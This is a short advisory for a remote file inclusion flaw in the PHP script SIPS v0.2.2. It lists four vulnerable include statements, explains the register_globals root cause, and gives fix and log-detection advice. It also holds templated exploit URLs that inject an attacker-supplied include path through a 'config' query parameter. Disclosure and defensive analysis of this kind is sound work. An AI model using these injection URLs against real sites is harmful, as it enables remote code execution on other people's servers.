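===============================================================================

 [o] SIPS v0.2.2 Remote File Inclusion Vulnerability

     Software : SIPS v0.2.2
     Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
     Author   : Cru3l.b0y
     Home     : WwW.DeltaHacking.Net

===============================================================================

 [o] Vulnerable files

     search.php

         include $config["sipssys"] ."/code/news.inc.php";

     readmore.php

         include $config["sipssys"] ."/code/news.inc.php";

     index.php

         include $config["sipssys"] ."/code/news.inc.php";
         include $config["sipssys"] ."/code/box.inc.php";

     search/submit.php

         include $config["sipssys"] ."/code/search.inc.php";

 [o] Root cause

     Each listed script builds the path of an include statement from
     $config["sipssys"]. The request URLs below imply that this value can be
     set from the query string, which would require $config to be unassigned
     at the point of the include and register_globals (or an equivalent import
     of request variables) to be enabled; the advisory does not show the code
     that normally sets $config. Inclusion of a remote URL further depends on
     the PHP settings allow_url_fopen and, from PHP 5.2, allow_url_include.

 [o] Exploit

     http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
     http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
     http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
     http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]

 [o] Fix / detection

     Assign $config from the application's own configuration file before any
     include runs in these four scripts, or build the include path from a
     constant or __DIR__ so that no request value can reach it. Run PHP with
     register_globals = Off and allow_url_include = Off. For detection, review
     web server access logs for requests to search.php, readmore.php,
     index.php or search/submit.php that carry a "config" query parameter.

===============================================================================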